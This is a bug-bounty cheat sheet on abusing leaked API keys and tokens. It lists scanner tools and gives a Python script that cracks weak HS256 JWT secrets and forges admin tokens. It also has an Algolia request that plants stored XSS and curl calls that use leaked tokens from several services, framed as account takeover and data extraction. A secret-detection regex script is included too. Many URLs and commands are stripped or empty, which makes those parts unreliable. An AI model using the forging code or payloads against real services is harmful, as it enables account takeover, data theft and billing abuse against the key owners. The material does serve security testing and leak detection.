# API Key and Token Leaks
> An API key is a unique identifier used to authenticate requests associated with your project. Some developers hardcode keys in source or leave them on public shares, where anyone who finds them can use them.
## Summary

- [Tools](#tools)
- [Exploit](#exploit)
    - [Google Maps](#google-maps)
    - [Algolia](#algolia)
    - [Slack API Token](#slack-api-token)
    - [Facebook Access Token](#facebook-access-token)
    - [Github client id and client secret](#github-client-id-and-client-secret)
    - [Twilio Account_sid and Auth Token](#twilio-account_sid-and-auth-token)
    - [Twitter API Secret](#twitter-api-secret)
    - [Twitter Bearer Token](#twitter-bearer-token)
    - [Gitlab Personal Access Token](#gitlab-personal-access-token)
    - [HockeyApp API Token](#hockeyapp-api-token)
    - [Mapbox API Token](#mapbox-api-token)
- [References](#references)

## Tools
- [momenbasel/KeyFinder]( - a tool that lets you find keys while surfing the web
- [streaak/keyhacks]( - a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid
- [trufflesecurity/truffleHog]( - Find credentials all over the place
    ```bash
    # Scan a Github Organization
    docker run --rm -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest github --org=trufflesecurity

    # Scan a GitHub Repository, its Issues and Pull Requests
    docker run --rm -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest github --repo --issue-comments --pr-comments

    # Scan a Docker image for verified secrets
    docker run --rm -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest docker --image trufflesecurity/secrets
    ```
- [aquasecurity/trivy]( - General purpose vulnerability and misconfiguration scanner which also searches for API keys/secrets
- [projectdiscovery/nuclei-templates]( - Use these templates to test an API token against many API service endpoints
    ```bash
    nuclei -t token-spray/ -var token=token_list.txt
    ```
- [blacklanternsecurity/badsecrets]( - A library for detecting known or weak secrets across many platforms
    ```bash
    python examples/ --url
    python examples/ eyJhbGciOiJIUzI1NiJ9.eyJJc3N1ZXIiOiJJc3N1ZXIiLCJVc2VybmFtZSI6IkJhZFNlY3JldHMiLCJleHAiOjE1OTMxMzM0ODMsImlhdCI6MTQ2NjkwMzA4M30.ovqRikAo_0kKJ0GVrAwQlezymxrLGjcEiW_s3UJMMCo
    python ./badsecrets/examples/ --viewstate /wEPDwUJODExMDE5NzY5ZGQMKS6jehX5HkJgXxrPh09vumNTKQ== --generator EDD8C9AE
    python ./badsecrets/examples/ --url http://vulnerablesite/Telerik.Web.UI.DialogHandler.aspx
    python ./badsecrets/examples/ --url https://localhost/
    ```
- [mazen160/secrets-patterns-db]( - Secrets Patterns DB: The largest open-source Database for detecting secrets, API keys, passwords, tokens, and more.
- [d0ge/sign-saboteur]( - SignSaboteur is a Burp Suite extension for editing, signing, verifying various signed web tokens
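As an added example (not code from this page, nor from badsecrets or SignSaboteur), the core of what those tools do for HS256 JSON Web Tokens: try each candidate secret until the HMAC reproduces the token's signature, then re-sign a modified payload with the recovered secret. The wordlist, the sample token and the `role` claim are constructed here for illustration; a real run would use a curated list of known framework defaults.

```python
import base64
import hashlib
import hmac
import json


def _b64url(data: bytes) -> str:
    """Base64url without padding, as JWT segments are encoded."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64url_decode(segment: str) -> bytes:
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def sign_hs256(payload: dict, secret: str) -> str:
    """Build a compact JWT signed with HMAC-SHA256 over header.payload."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = (
        _b64url(json.dumps(header, separators=(",", ":")).encode())
        + "."
        + _b64url(json.dumps(payload, separators=(",", ":")).encode())
    )
    sig = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + _b64url(sig)


def decode_payload(token: str) -> dict:
    """Decode the claims without verifying anything (what an attacker reads first)."""
    return json.loads(_b64url_decode(token.split(".")[1]))


def crack_hs256(token: str, candidates):
    """Return the first candidate secret that reproduces the signature, else None."""
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
        header = json.loads(_b64url_decode(header_b64))
        signature = _b64url_decode(sig_b64)
    except ValueError:
        return None  # not a three-part token, or segments are not valid base64url/JSON
    if header.get("alg") != "HS256":
        return None  # only symmetric HMAC secrets can be guessed this way
    signing_input = f"{header_b64}.{payload_b64}".encode()
    for secret in candidates:
        guess = hmac.new(secret.encode(), signing_input, hashlib.sha256).digest()
        if hmac.compare_digest(guess, signature):
            return secret
    return None


def forge_admin_token(token: str, candidates):
    """If the secret is weak, re-sign the token with role=admin (the SignSaboteur use case)."""
    secret = crack_hs256(token, candidates)
    if secret is None:
        return None
    payload = decode_payload(token)
    payload["role"] = "admin"  # 'role' is an assumed claim name for this illustration
    return sign_hs256(payload, secret)


# Constructed wordlist standing in for the known-default lists these tools ship with.
WEAK_SECRETS = ["secret", "password", "changeme", "your-256-bit-secret", "jwt_secret"]

# Constructed sample: a token an application signed with a default secret.
SAMPLE_TOKEN = sign_hs256({"sub": "1234", "role": "user"}, "changeme")


if __name__ == "__main__":
    found = crack_hs256(SAMPLE_TOKEN, WEAK_SECRETS)
    print("recovered secret:", found)
    print("forged token:", forge_admin_token(SAMPLE_TOKEN, WEAK_SECRETS))
```

The `alg` check matters: a token signed with RS256 cannot be brute-forced this way, and a library that blindly accepts `alg: none` or a public key as an HMAC secret is a separate class of bug that SignSaboteur also covers.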
## Exploit
The following commands can be used to take over accounts or extract personal information from the API using the leaked token. Always confirm the token is still valid first: most of the calls below return an explicit authentication error for a revoked key, which tells you the finding is dead before you write it up.

### Google Maps
Use the following endpoints, replacing `KEY_HERE` with the leaked key:

| Name | Endpoint |
| --------------------- | --------- |
| Static Maps | |
| Streetview |,-73.988354&fov=90&heading=235&pitch=10&key=KEY_HERE |
| Embed | |
| Directions | |
| Geocoding |,30&key=KEY_HERE |
| Distance Matrix |,-73.89188969999998&destinations=40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.659569%2C-73.933783%7C40.729029%2C-73.851524%7C40.6860072%2C-73.6334271%7C40.598566%2C-73.7527626%7C40.659569%2C-73.933783%7C40.729029%2C-73.851524%7C40.6860072%2C-73.6334271%7C40.598566%2C-73.7527626&key=KEY_HERE |
| Find Place from Text |,formatted_address,name,rating,opening_hours,geometry&key=KEY_HERE |
| Autocomplete | |
| Elevation |,-104.9847034&key=KEY_HERE |
| Timezone |,-119.6822510&timestamp=1331161200&key=KEY_HERE |
| Roads |,24.942795|60.170879,24.942796|60.170877,24.942796&key=KEY_HERE |
| Geolocate | |

Impact of a leaked Google Maps key:

* Consume the company's monthly quota, or run up the bill through unauthorized use of the service and cause financial damage
* Cause a denial of service against the mapping features if a maximum billing limit is configured in the Google account: once the cap is hit, legitimate requests start failing too

Check which APIs the key is enabled for and whether it carries HTTP referrer or IP restrictions; a key that answers `REQUEST_DENIED` on every endpoint above is restricted and of little use.

### Algolia

Index settings are only writable with an admin or write-scoped key; a search-only key is rejected. With a privileged key, the highlighting tags become stored XSS on any frontend that renders highlighted results unescaped:

```bash
curl --request PUT \
  --url https://<application-id><example-index>/settings \
  --header 'content-type: application/json' \
  --header 'x-algolia-api-key: <example-key>' \
  --header 'x-algolia-application-id: <example-application-id>' \
  --data '{"highlightPreTag": "<script>alert(1);</script>"}'
```
### Slack API Token

```bash
curl -sX POST ""
```
### Facebook Access Token
### Github client id and client secret

```bash
curl ''
```
### Twilio Account_sid and Auth token
### Twitter API Secret

```bash
curl -u 'API key:API secret key' --data 'grant_type=client_credentials' ''
```
### Twitter Bearer Token

```bash
curl --request GET --url --header 'authorization: Bearer TOKEN'
```
### Gitlab Personal Access Token

```bash
curl "<your_access_token>"
```

### HockeyApp API Token

```bash
curl -H "X-HockeyAppToken: ad136912c642076b0d1f32ba161f1846b2c"
```
### Mapbox API Token
A Mapbox access token is a JSON Web Token whose first segment names the token type: `sk` (secret), `pk` (public) or `tk` (temporary). If it starts with `sk`, jackpot. If it's `pk` or `tk`, it's not worth your time: public tokens carry only the read scopes meant for client-side use, and temporary tokens expire within an hour.

* Check token validity: `curl ""`
* Get list of all tokens associated with an account (only works if the token is a Secret Token (sk), and has the appropriate scope): `curl ""`
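
An added example, not code from the original page: a minimal offline scanner in the spirit of the tools listed above, plus the Mapbox triage step described here. The regexes are simplified assumptions about the usual shapes of these credentials (a curated set such as secrets-patterns-db is the real thing), the sample config is constructed, and the payload field `u` is assumed to be the account username as seen in Mapbox's published public tokens.

```python
import base64
import json
import re

# Simplified detection patterns (assumed shapes, not a curated database).
PATTERNS = {
    "Google API key": re.compile(r"AIza[0-9A-Za-z_-]{35}"),
    "Slack token": re.compile(r"xox[baprs]-[0-9A-Za-z-]{10,}"),
    "GitHub token": re.compile(r"gh[pousr]_[A-Za-z0-9]{36}"),
    "GitLab PAT": re.compile(r"glpat-[0-9A-Za-z_-]{20}"),
    "Twilio Account SID": re.compile(r"\bAC[0-9a-f]{32}\b"),
    "Mapbox token": re.compile(r"\b[pst]k\.eyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+"),
}


def find_secrets(text):
    """Return (pattern name, matched value) pairs in order of appearance in `text`."""
    hits = []
    for name, rx in PATTERNS.items():
        for m in rx.finditer(text):
            hits.append((m.start(), name, m.group(0)))
    return [(name, value) for _, name, value in sorted(hits)]


def _b64url_decode(segment):
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def triage_mapbox_token(token):
    """Classify a Mapbox token by its type prefix and decode its payload (unverified)."""
    parts = token.split(".")
    if len(parts) != 3 or parts[0] not in ("pk", "sk", "tk"):
        return {"type": None, "worth_pursuing": False, "username": None, "payload": {}}
    token_type, payload_b64 = parts[0], parts[1]
    try:
        payload = json.loads(_b64url_decode(payload_b64))
    except ValueError:  # covers bad base64, bad UTF-8 and bad JSON
        payload = {}
    return {
        "type": token_type,
        "worth_pursuing": token_type == "sk",  # only secret tokens are worth following up
        "username": payload.get("u"),          # 'u' assumed to be the account username
        "payload": payload,
    }


def _fake_mapbox(token_type, username):
    """Constructed token in Mapbox's <type>.<payload>.<signature> layout; not a real credential."""
    payload = json.dumps({"u": username, "a": "cl0example"}).encode()
    return f"{token_type}.{base64.urlsafe_b64encode(payload).rstrip(b'=').decode()}.notarealsignature"


# Constructed sample: a config file accidentally committed to a public repository.
SAMPLE_TEXT = "\n".join([
    "# deploy settings",
    "GOOGLE_MAPS_KEY=" + "AIzaSy" + "F" * 33,
    "SLACK_BOT_TOKEN=xoxb-000000000000-111111111111-abcdefABCDEF",
    "GITHUB_TOKEN=ghp_" + "A" * 36,
    "GITLAB_TOKEN=glpat-" + "x" * 20,
    "TWILIO_ACCOUNT_SID=AC" + "0" * 32,
    "MAPBOX_PUBLIC=" + _fake_mapbox("pk", "example-user"),
    "MAPBOX_SECRET=" + _fake_mapbox("sk", "example-user"),
])


if __name__ == "__main__":
    for name, value in find_secrets(SAMPLE_TEXT):
        line = f"{name}: {value[:12]}..."
        if name == "Mapbox token":
            line += f" -> {triage_mapbox_token(value)}"
        print(line)
```

The scanner only tells you a string looks like a credential; the curl calls in this section are what confirm it is live. For Mapbox, the triage step saves a request entirely: a `pk` or `tk` prefix means stop, an `sk` prefix means go on to the token-listing call above.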
## References
* [Finding Hidden API Keys & How to use them - Sumit Jain - August 24, 2019](
* [Private API key leakage due to lack of access control - yox - August 8, 2018](
* [Saying Goodbye to my Favorite 5 Minute P1 - Allyson O'Malley - January 6, 2020](
* [Mapbox API Token Documentation](
* [Introducing SignSaboteur: forge signed web tokens with ease - Zakhar Fedotkin - 22 May 2024](